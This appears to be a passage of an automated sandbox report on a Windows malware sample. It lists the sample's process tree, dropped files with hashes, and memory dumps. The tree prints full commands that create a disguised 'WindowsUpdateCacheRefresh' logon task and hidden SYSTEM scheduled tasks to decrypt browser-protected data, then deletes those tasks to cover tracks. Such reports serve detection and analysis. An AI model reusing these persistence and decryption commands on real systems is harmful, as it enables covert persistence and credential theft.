                                                                          PID:5060
                                                                        • C:\Windows\SYSTEM32\sc.exe
                                                                          "sc.exe" start WinDefend
                                                                          4⤵
                                                                            PID:4592
                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                          wmic computersystem get model
                                                                          3⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:1096
                                                                        • C:\Windows\SYSTEM32\getmac.exe
                                                                          getmac /FO CSV /NH
                                                                          3⤵
                                                                            PID:5364
                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\RuntimeBrokerCache.exe
                                                                            C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\RuntimeBrokerCache.exe --psh-guardian --monitor 3928
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:5456
                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\RuntimeBrokerCache.exe
                                                                              C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\RuntimeBrokerCache.exe --psh-guardian --monitor 3928
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              PID:4976
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "ver"
                                                                                5⤵
                                                                                • Executes a command shell one-liner
                                                                                PID:5452
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks /create /tn "Microsoft\Windows\WindowsUpdate\WindowsUpdateCacheRefresh" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe" /sc onlogon /rl highest /f
                                                                                5⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:4380
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "schtasks /delete /tn DecryptABE_3928_092f11f2 /f"
                                                                            3⤵
                                                                            • Indicator Removal: Clear Persistence
                                                                            PID:4644
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /delete /tn DecryptABE_3928_092f11f2 /f
                                                                              4⤵
                                                                                PID:6108
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -NoProfile -Command "$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"-NoProfile -WindowStyle Hidden -Command & 'C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\helper.exe' 'C:\Users\Admin\AppData\Local\Temp\_abe_outer_3928_092f11f2.bin' 'C:\Users\Admin\AppData\Local\Temp\_abe_inner_3928_092f11f2.bin'\"; $principal = New-ScheduledTaskPrincipal -UserId \"NT AUTHORITY\SYSTEM\" -LogonType ServiceAccount -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden; $task = New-ScheduledTask -Action $action -Principal $principal -Settings $settings; Register-ScheduledTask -TaskName \"DecryptABE_3928_092f11f2\" -InputObject $task -Force; Start-ScheduledTask -TaskName \"DecryptABE_3928_092f11f2\""
                                                                              3⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2372
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "schtasks /delete /tn DecryptABE_3928_092f11f2 /f"
                                                                              3⤵
                                                                              • Indicator Removal: Clear Persistence
                                                                              PID:5084
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /delete /tn DecryptABE_3928_092f11f2 /f
                                                                                4⤵
                                                                                  PID:1948
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "schtasks /delete /tn DecryptKSP_3928_edfd58bf /f"
                                                                                3⤵
                                                                                • Indicator Removal: Clear Persistence
                                                                                PID:1636
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /delete /tn DecryptKSP_3928_edfd58bf /f
                                                                                  4⤵
                                                                                    PID:1080
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -NoProfile -Command "$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"-NoProfile -WindowStyle Hidden -Command & 'C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\ksp_helper.exe' 'C:\Users\Admin\AppData\Local\Temp\_ksp_blob_3928_edfd58bf.bin' 'C:\Users\Admin\AppData\Local\Temp\_ksp_out_3928_edfd58bf.bin' '785435725a573571565662727670754100'\"; $principal = New-ScheduledTaskPrincipal -UserId \"NT AUTHORITY\SYSTEM\" -LogonType ServiceAccount -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden; $task = New-ScheduledTask -Action $action -Principal $principal -Settings $settings; Register-ScheduledTask -TaskName \"DecryptKSP_3928_edfd58bf\" -InputObject $task -Force; Start-ScheduledTask -TaskName \"DecryptKSP_3928_edfd58bf\""
                                                                                  3⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1096
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "schtasks /delete /tn DecryptKSP_3928_edfd58bf /f"
                                                                                  3⤵
                                                                                  • Indicator Removal: Clear Persistence
                                                                                  PID:1104
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /delete /tn DecryptKSP_3928_edfd58bf /f
                                                                                    4⤵
                                                                                      PID:4764
                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\msg_helper.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\msg_helper.exe ZnVjayBvZmY= V2luZG93cw==
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:716
                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
                                                                                "C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe" "C:\Users\Admin\AppData\Local\Temp\_MEI34722\main.py"
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:5996
                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe
                                                                                  "C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\WindowsUpdateService.exe" "C:\Users\Admin\AppData\Local\Temp\_MEI34722\main.py"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4884
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "ver"
                                                                                    3⤵
                                                                                    • Executes a command shell one-liner
                                                                                    PID:1160
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "powershell.exe" -NoProfile -WindowStyle Hidden -Command & 'C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\helper.exe' 'C:\Users\Admin\AppData\Local\Temp\_abe_outer_3928_092f11f2.bin' 'C:\Users\Admin\AppData\Local\Temp\_abe_inner_3928_092f11f2.bin'
                                                                                1⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Windows directory
                                                                                • Modifies data under HKEY_USERS
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2564
                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\helper.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\helper.exe" C:\Users\Admin\AppData\Local\Temp\_abe_outer_3928_092f11f2.bin C:\Users\Admin\AppData\Local\Temp\_abe_inner_3928_092f11f2.bin
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1716
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "powershell.exe" -NoProfile -WindowStyle Hidden -Command & 'C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\ksp_helper.exe' 'C:\Users\Admin\AppData\Local\Temp\_ksp_blob_3928_edfd58bf.bin' 'C:\Users\Admin\AppData\Local\Temp\_ksp_out_3928_edfd58bf.bin' '785435725a573571565662727670754100'
                                                                                1⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Windows directory
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:1196
                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\ksp_helper.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\ksp_helper.exe" C:\Users\Admin\AppData\Local\Temp\_ksp_blob_3928_edfd58bf.bin C:\Users\Admin\AppData\Local\Temp\_ksp_out_3928_edfd58bf.bin 785435725a573571565662727670754100
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4360
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k GPSvcGroup
                                                                                1⤵
                                                                                  PID:5132
                                                                                • C:\Windows\system32\sihost.exe
                                                                                  sihost.exe
                                                                                  1⤵
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:4272
                                                                                  • C:\Windows\explorer.exe
                                                                                    explorer.exe /LOADSAVEDWINDOWS
                                                                                    2⤵
                                                                                    • Boot or Logon Autostart Execution: Active Setup
                                                                                    • Enumerates connected drives
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4640
                                                                                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1348
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1688

                                                                                Network

                                                                                      MITRE ATT&CK Enterprise v16

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      device.token

                                                                                      • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\ProfileSync\config\device.token
                                                                                      • Size 61B
                                                                                      • SHA256 45bbb8a3152814541b483ffc1efa4dc9a1728bb0f97890f621440a452fc86faf
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      prep_Activatable Class_Hermes_perf.cache

                                                                                      • Path C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\prep_Activatable Class_Hermes_perf.cache
                                                                                      • Size 607B
                                                                                      • SHA256 be6b74e52e5eef1f1c27c0976bf3bf1bfa99958c00bbef2898a602f691be6dae
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      prep_Activatable Class_Hermes_perf.cache

                                                                                      • Path C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\prep_Activatable Class_Hermes_perf.cache
                                                                                      • Size 599B
                                                                                      • SHA256 b536a3dae9ea5c69081f0491eed829e3b57e32401fdf49a63031bcd6b20e6fdb
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      qtbase_en.qm

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI33922\PyQt5\Qt5\translations\qtbase_en.qm
                                                                                      • Size 16B
                                                                                      • SHA256 9959b510b15d18937848ad13007e30459d2e993c67e564badbfc18f935695c85
                                                                                      • MD5 SHA1 SHA512

                                                                                      QtCore.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI34722\PyQt5\QtCore.pyd
                                                                                      • Size 2.4MB
                                                                                      • SHA256 d6e45fd8c3b3f93f52c4d1b6f9e3ee220454a73f80f65f3d70504bd55415ea37
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      debug.log

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI34722\api\data\debug.log
                                                                                      • Size 1KB
                                                                                      • SHA256 c2e1c36f7a90ae2ad5604530747947d644f0bf3eb76d1fde4c4220906825e1d5
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      msg_helper.exe

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI34722\app\msg_helper.exe
                                                                                      • Size 4KB
                                                                                      • SHA256 cb62d6acef38cf740bd66153097c8f7506ffccf0a34154670338ef617fb8132c
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      base_library.zip

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI34722\base_library.zip
                                                                                      • Size 1.3MB
                                                                                      • SHA256 f227c88c9c7918060e62f454776e96e0928a340012c1da8f16eeb5a1e080a248
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      VCRUNTIME140.dll

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\VCRUNTIME140.dll
                                                                                      • Size 117KB
                                                                                      • SHA256 052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _bz2.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_bz2.pyd
                                                                                      • Size 85KB
                                                                                      • SHA256 33641a8ad0403473d678c7435197d49550fc5185ba7979fb16ab80256b1f9072
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _ctypes.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_ctypes.pyd
                                                                                      • Size 139KB
                                                                                      • SHA256 79967d8614f735cc62b81649641fd8d0414ca66d3d6656fa7788334bbdbbd35b
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _hashlib.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_hashlib.pyd
                                                                                      • Size 67KB
                                                                                      • SHA256 58c5c9ff93f989e2a233b8c5e06420ea73dd6c013e1f08d996fb0f2828eba0aa
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _loader_mode.txt

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_loader_mode.txt
                                                                                      • Size 10B
                                                                                      • SHA256 ab8e18ef4ebebeddc0b3152ce9c9006e14fc05242e3fc9ce32246ea6a9543074
                                                                                      • MD5 SHA1 SHA512

                                                                                      _lzma.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_lzma.pyd
                                                                                      • Size 157KB
                                                                                      • SHA256 a01f1927adaa60adcfbe3b0314205a528cb9dd5a93b7e61cb284eddee9b0b347
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _socket.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_socket.pyd
                                                                                      • Size 85KB
                                                                                      • SHA256 435a86973131c5d5dc90f828e72d7bb0607578a48ab5bc5377f4a280a6beb8f7
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _ssl.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_ssl.pyd
                                                                                      • Size 180KB
                                                                                      • SHA256 06f51fbe150c831af619890eea2d9fca9ce8b49758bfe3f382883551c592e6b3
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _zstd.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\_zstd.pyd
                                                                                      • Size 491KB
                                                                                      • SHA256 e5924e2985186797668dd3b2e1efeb9313459258a4564dbf5499935c7ebd44e7
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      base_library.zip

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\base_library.zip
                                                                                      • Size 1.3MB
                                                                                      • SHA256 9d41541158710a61e28516cf99b99bfdc48e69cbddc925678a3dc3a73e3dde20
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      libcrypto-3.dll

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\libcrypto-3.dll
                                                                                      • Size 5.0MB
                                                                                      • SHA256 eaf6d613b95b61a39558d84c50e72630a66c99914292df88e7b54ebd60c5bd34
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      libffi-8.dll

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\libffi-8.dll
                                                                                      • Size 38KB
                                                                                      • SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      libssl-3.dll

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\libssl-3.dll
                                                                                      • Size 776KB
                                                                                      • SHA256 cf1a5fdcefa3daf69041f31f98ece1d7911ca4fcb8e9f1043b4d0f459ae4c936
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _psutil_windows.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\psutil\_psutil_windows.pyd
                                                                                      • Size 69KB
                                                                                      • SHA256 0035450801bd7d938e9e146c5ec28e619cb5a5f4a18cdc53ac7e9734c7f94f78
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      python3.DLL

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\python3.DLL
                                                                                      • Size 72KB
                                                                                      • SHA256 1dd696f02326e32e67b52c25b249b3acce3238176212d16e8fb1a050a1455ae9
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      python314.dll

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54002\python314.dll
                                                                                      • Size 6.5MB
                                                                                      • SHA256 a07f7d09c3121492bb066535c6d0811df5fbc2090cbca7031a97bb47ce1480c9
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _SHA224.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54562\Crypto\Hash\_SHA224.pyd
                                                                                      • Size 21KB
                                                                                      • SHA256 773fac9a1a65b31d22f79a5e4f035ddc00301b741873d334ee9902db1d1bebfd
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      _obfuscated_config.py

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54562\_obfuscated_config.py
                                                                                      • Size 271B
                                                                                      • SHA256 92a9ddc1418707e4356c11985b3a259acf4d0ca8affc669beee02bb0764174e3
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      INSTALLER

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI54562\cryptography-49.0.0.dist-info\INSTALLER
                                                                                      • Size 4B
                                                                                      • SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
                                                                                      • MD5 SHA1 SHA512

                                                                                      _decimal.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI59962\_decimal.pyd
                                                                                      • Size 284KB
                                                                                      • SHA256 1f4a8ca9814508d3597992173fdf4db312f3b970f6baeb053b9d8c3087f907e7
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      shell_helper.exe

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI59962\app\shell_helper.exe
                                                                                      • Size 13KB
                                                                                      • SHA256 94a2e77562b000bb546dfaec20727d5cce4ab7d04ab5ce26dbf1cc55a9acfd8a
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      select.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI59962\select.pyd
                                                                                      • Size 32KB
                                                                                      • SHA256 56441c3148743a0890986ccdf93fea8174155b0ee84db2493151f075d8e7c51a
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      unicodedata.pyd

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\_MEI59962\unicodedata.pyd
                                                                                      • Size 740KB
                                                                                      • SHA256 58013696b4f08717aee2885aefa24031f4b18b3e62faa8125248cc3e0a86af2a
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      __PSScriptPolicyTest_ejkjd444.mur.ps1

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejkjd444.mur.ps1
                                                                                      • Size 60B
                                                                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                      • MD5 SHA1 SHA512 TLSH

                                                                                      tmp6iwkklmg.png

                                                                                      • Path C:\Users\Admin\AppData\Local\Temp\tmp6iwkklmg.png
                                                                                      • Size 362KB
                                                                                      • SHA256 b732a2a5382b205415d0f93607524d99c9b76d2097fbecf3a024466700b6ddad
                                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                      memory/704-680-0x00007FF8B7B40000-0x00007FF8B7DA3000-memory.dmp

                                                                                      memory/716-1372-0x0000000000080000-0x0000000000088000-memory.dmp

                                                                                      memory/1096-1331-0x0000029D9F310000-0x0000029D9F3C2000-memory.dmp

                                                                                      memory/1348-1457-0x0000026600000000-0x0000026600100000-memory.dmp

                                                                                      memory/1348-1474-0x0000026613AA0000-0x0000026613BA0000-memory.dmp

                                                                                      memory/1348-1473-0x0000026603660000-0x0000026603680000-memory.dmp

                                                                                      memory/1348-1491-0x00000266038C0000-0x00000266038E0000-memory.dmp

                                                                                      memory/1348-1505-0x0000026614400000-0x0000026614420000-memory.dmp

                                                                                      memory/1716-1321-0x00000000003B0000-0x00000000003B8000-memory.dmp

                                                                                      memory/2372-1242-0x00000193F2350000-0x00000193F236E000-memory.dmp

                                                                                      memory/2372-1214-0x00000193F25D0000-0x00000193F2682000-memory.dmp

                                                                                      memory/2512-60-0x00000258264F0000-0x000002582650E000-memory.dmp

                                                                                      memory/2512-66-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-62-0x00000258264E0000-0x00000258264EA000-memory.dmp

                                                                                      memory/2512-50-0x00007FF8B84BF000-0x00007FF8B84C0000-memory.dmp

                                                                                      memory/2512-61-0x0000025826840000-0x00000258268F2000-memory.dmp

                                                                                      memory/2512-52-0x0000025826460000-0x0000025826482000-memory.dmp

                                                                                      memory/2512-57-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-69-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-56-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-64-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-65-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-63-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-67-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-73-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-71-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-68-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-55-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-51-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/2512-70-0x00007FF8B8330000-0x00007FF8B8CD4000-memory.dmp

                                                                                      memory/3864-709-0x00000269C0190000-0x00000269C0242000-memory.dmp

                                                                                      memory/3928-679-0x00007FF8B8890000-0x00007FF8B8AF3000-memory.dmp

                                                                                      memory/4360-1335-0x0000000000B80000-0x0000000000B88000-memory.dmp

                                                                                      memory/4688-720-0x0000021CA80B0000-0x0000021CA8162000-memory.dmp

                                                                                      memory/4704-693-0x000002036F4E0000-0x000002036F592000-memory.dmp

                                                                                      memory/4712-688-0x0000000000510000-0x000000000051A000-memory.dmp

                                                                                      memory/4884-1315-0x00007FF8B7B40000-0x00007FF8B7DA3000-memory.dmp

                                                                                      memory/4976-1106-0x00007FF8B28B0000-0x00007FF8B2B13000-memory.dmp